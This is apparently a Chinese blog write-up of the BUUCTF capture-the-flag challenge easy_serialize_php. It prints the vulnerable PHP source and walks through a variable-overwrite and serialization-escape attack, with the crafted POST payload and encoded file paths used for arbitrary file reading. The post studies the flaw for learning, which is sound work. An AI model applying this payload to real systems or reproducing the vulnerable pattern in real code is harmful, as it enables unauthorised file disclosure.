BUUCTF [安洵杯 2019]easy_serialize_php

最新推荐文章于 2024-07-28 08:43:29 发布
最新推荐文章于 2024-07-28 08:43:29 发布
阅读量561 收藏
点赞数 1
分类专栏: BUUCTF 文章标签: php 开发语言 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62107966/article/details/127029949
版权

考点:

变量覆盖、反序列化中的对象逃逸

题目地址:BUUCTF在线评测

源码如下:

 <?php

$function = @$_GET['f'];

function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}


if($_SESSION){
    unset($_SESSION);
}

$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;

extract($_POST);

if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}

if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}

$serialize_info = filter(serialize($_SESSION));

if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

传入参数为phpinfo,会eval执行phpinfo

发现了一个文件,d0g3_flag.php,后面待用。

分析源代码总结这道题思路如下:

通过利用file_get_contents来获取flag,往前推关键是$userinfo['img']这个变量要是个文件才可以。这个变量是serialize_info反序列化来的。然而 serialize_info又是_SESSION序列化在经过filter函数得来的。又因为$userinfo['img']有img这个键值,那么往前推应该是 _SESSION这个变量里也要有img这个键值。

大体分析清楚后,明白这里就有利用的空间了:

$serialize_info = filter(serialize($_SESSION));//

数据经过序列化了之后又经过了一层过滤函数,而这层过滤函数会干扰序列化后的数据。

任何具有一定结构的数据,如果经过了某些处理而把结构体本身的结构给打乱了,则有可能会产生漏洞。

fiter函数过滤'php','flag','php5','php4','fl1g'这几个,所以我们待会可以控制序列化连里的某些键值为过滤的这些:'php','flag','php5','php4','fl1g',导致其长度与前面的数量不匹配,进而会和后面的键值对结合,造成反序列化对象逃逸。这里到构造序列化链时在细说。

可以通过控制_SESSION变量的img键值为含有flag的某个文件,最后赋值给到$userinfo['img'],那一经file_get_contents读取便可拿到flag。

知道怎么利用img参数了,这里有几个注意的地方如下:

if(!$_GET['img_path']){//$_GET['img_path'] 为空情况下会默认给定一个图片文件名 然后进行base64编码 赋值给SESSION
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}//这里对接收到的img文件名进行base64编码和sha1加密

这里会对强行给img键值赋值,但是不影响,当用POST__传参新的序列化值进去后, extract($POST);这个函数会将构造的新的键值重新赋值给img,这里就是变量覆盖了。

构造开始,首先构造序列化链:

因为$userinfo['img']是要经过base解码的,所以我们要将待会给img键值赋值时应先进行编码:

先利用刚刚得到的d0g3_f1ag.php,先读一下这个文件,它的 base64编码是ZDBnM19mMWFnLnBocA==

$_SESSION["user"] = 'guest';
$_SESSION['function'] = 'a';
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';
var_dump(serialize($_SESSION));

得到: "a:3:{s:4:"user";s:5:"guest";s:8:"function";s:1:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"**

令user值为'flagflagflagflagflagflag'

function值为:'a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}'

img值不变,即:

$_SESSION["user"] = 'flagflagflagflagflagflag';
$_SESSION['function'] = 'a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}';
$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';

序列化得到:

a:3:{s:4:"user";s:24:"flagflagflagflagflagflag";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}"

因为flag被过滤了,所以最终序列化链应该为:

 a:3:{s:4:"user";s:24:"";s:8:"function";s:59:"a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}

可以看到,user的内容长度依旧为24,但是已经没有内容了,所以反序列化时会自动往后读取24位:会读取到上图的位置,然后结束,由于user的序列化内容读取数据时需要往后填充24位,导致后面function的内容也发生了改变,吞掉了其双引号,导致我们可以控制后面的序列化内容。这里引用原文的解释:安洵杯2019 官方Writeup(Web/Misc) - D0g3 - 先知社区

php反序列化时,当一整段内容反序列化结束后,后面的非法字符将会被忽略,而如何判断是否结束呢,可以看到,前面有一个a:3,表示序列化的内容是一个数组,有三个键,而以{作为序列化内容的起点,}作为序列化内容的终点。

所以此时后面的";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}在反序列化时就会被当作非法字符忽略掉,导致我们可以控制$userinfo["img"]的值,达到任意文件读取的效果。

分析完毕,最终构造如下:

url?file参数应该为show_image,下面的语句才会成立。

}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

POST传的参数如下:  

_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=a";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"dd";s:1:"a";}&$_SESSION['img'] = 'ZDBnM19mMWFnLnBocA==';

 

f12查看源代码:  

 

提示flag在/d0g3_fllllllag里面,对d0g3_fllllllag进行base64编码:

L2QwZzNfZmxsbGxsbGFn,

再次构造参数,拿到flag。 

 

最后这里还有个小疑问:

看别人构造的时候,发现&$_SESSION['img'] = 'L2QwZzNfZmxsbGxsbGFn';不用传进去也可以拿到flag:  

 

 那么序列化的时候不就成了只有两个键进行序列化,那最后的";s:3:"img";s:28:"L3VwbG9hZC9ndWVzdF9pbWcuanBn";}根本没有出现呀,那又怎么会构成反序列化对象img逃逸,被赋值为L3VwbG9hZC9ndWVzdF9pbWcuanBn??那后面的img不是mei有赋到值吗???( 本人新手小白,希望大佬们不吝赐教,这里为啥是这样)

 

ps:

若引用文章侵权,麻烦您第一时间跟我联系,我好删改,本人ctf新手,还望师傅们不吝赐教,欢迎斧正!感谢阅读。

泪涌@
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
buuctf[安洵 2019]easy_serialize_php
2202_75317918的博客
03-30 459
buuctf[安洵 2019]easy_serialize_php
BUUCTF [安洵 2019]easy_serialize_php 1 详细讲解
qq_56313338的博客
08-12 539
题目来自buuctf,这是一题关于php序列化逃逸的题。
BUUCTF:[安洵 2019]easy_serialize_php
末初的CSDN博客
03-03 943
https://buuoj.cn/challenges#[%E5%AE%89%E6%B4%B5%E6%9D%AF%202019]easy_serialize_php 访问/index.php?f=highlight_file得到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'
web buuctf [安洵 2019]easy_serialize_php
weixin_44214568的博客
04-02 451
考点:反序列化逃逸 这个题目是一道php代码审计题目,打开就是源码, <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return pr
BUUCTF】[安洵 2019]easy_serialize_php
aoao331198的博客
05-03 1264
直接看到源码 <?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION)
BUUCTF Web [安洵 2019]easy_serialize_php1
网安小趴菜
10-12 484
BUUCTF Web [安洵 2019]easy_serialize_php1
[安洵 2019]easy_serialize_php
qq_44749590的博客
06-10 929
[安洵 2019]easy_serialize_php BUUCTF
[安洵 2019]easy_serialize_php 1
shinygod的博客
03-04 1792
知识点:反序列化字符串逃逸(2种情形),extract变量覆盖漏洞 目录反序列化字符串逃逸反序列化的规则00x1:过滤后字符变多00x1:过滤后字符变少(本题就是此类型)值替换键替换 反序列化字符串逃逸 一般这类漏洞,都是在序列化之后,过滤,然后反序列化引起的。 反序列化的规则 了解反序列化字符串逃逸之前,先了解反序列化的规则 例如: a:2:{s:4:"user";s:5:"guest";s:8:"function";s:3:"aaa";} //第一个a代表这是一个数组序列化 php反序列化会以 ;
mfc_Serialize.zip_CplusSerializeM_MFC Serialize socket_MFC seria
09-19
`serialize`函数有两个主要形式:`void Serialize(CArchive& ar)`和`virtual void Serialize(__out_ecount_part(nCount, *pCount) void* lpData, UINT nCount, CArchive& ar)`。前者用于常规的成员变量串行化,后者...
se_mouz_image.rar_serialize_序列化
09-23
在这个“se_mouz_image.rar_serialize_序列化”的主题中,我们将深入探讨如何利用`serialize()`函数来序列化文档以及实现鼠标画图功能。 首先,我们来详细解释一下`serialize()`函数。`serialize()`是PHP内建的一个...
jet_serialize:用于 Javascript 的扩展序列化程序
06-11
**jet_serialize: 用于JavaScript的扩展序列化程序** 在JavaScript编程中,数据的序列化是一个常见的需求,它涉及将对象转换为字符串以便存储或传输。`jet_serialize`库提供了一个强大的解决方案,允许开发者以更...
PHP中json_encode、json_decode与serialize、unserialize的性能测试分析
10-29
今天偶然在想,如果用PHP写一个类似BDB的基于文件的Key-Value小型数据库用于存储非结构化的记录型数据,不知道效率会如何?
grpc_serialize_example
02-14
grpc_serialize_example ex) protoc -I . proto/metric.proto --python_out=.ex) protoc -I . proto/metric.proto --go_out=.
PHP框架详解 - symfony框架
最新发布
丁爸的博客
07-28 765
Symphony框架是一个功能强大、稳定可靠、易于扩展和定制的开源Web框架,适用于构建各种类型的Web应用程序。虽然在某些情况下可能会遇到一些性能和学习曲线的挑战,但是通过合理的配置和优化,以及积极的学习和实践,可以充分发挥Symphony框架的优势,构建高质量的Web应用程序。Symphony框架是一个基于PHP的开源Web框架,它提供了一套丰富的组件和工具,可以帮助开发者更轻松地构建高质量的Web应用程序。
c++语言实现类似swoole扩展的项目实践
北风之神Boreas
07-24 398
项目本质其实是C++项目开发,学员学习后增加对C++技术栈的实践能力,毕竟互联网的核心基石依然是C/C++。 当你要改变以前吸收的知识来源于国内视频教程,国内文章教程 国内文章资料 转向全球老外大佬云集的github开源项目吸收时,就要学C和C++ 而你以前的IT技术就是国内的教程 国内的社区 国内的文章 ,但都是有局限的,所以要转向github社区吸收开源项目的东西来增强个人技术体系。 技术只来源于实践,不是光看,光记就会的东西,纸上得来终觉浅绝知此事要躬行。
ecshop网站部署
qq_63926306的博客
07-24 352
ecshop网站部署
BGP选路之Next Hop
txs1269928052的博客
07-23 745
根据前面的实验步骤得知,10.0.100.1/32路由在R1上的Next Hop为0.0.0.0,说明当10.0.100.1/32的路由信息在由R1传递至EBGP对等体R2的过程中,Next Hop属性会被自动修改为发送BGP报文的源地址,即 10.0.12.1。R3上的现象与R2上的现象类似,这里不再赘述。为了使R4的BGP路由表中去往10.0.100.1/32的路由信息标记为可用,并放进P路由表中,必须使R4去往10.0.100.1/32的 BGP路由信息中的Next Hop是可达的。
跨境电商独立站:Shopify/Wordpress/店匠选哪个?
dongdonglin77的博客
07-26 903
商家需要根据自己的资源、能力和市场定位,选择最适合自己的建站工具,并制定有效的运营计划。通过持续的市场调研、品牌建设、流量获取和客户服务,商家可以在独立站的道路上实现可持续发展。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值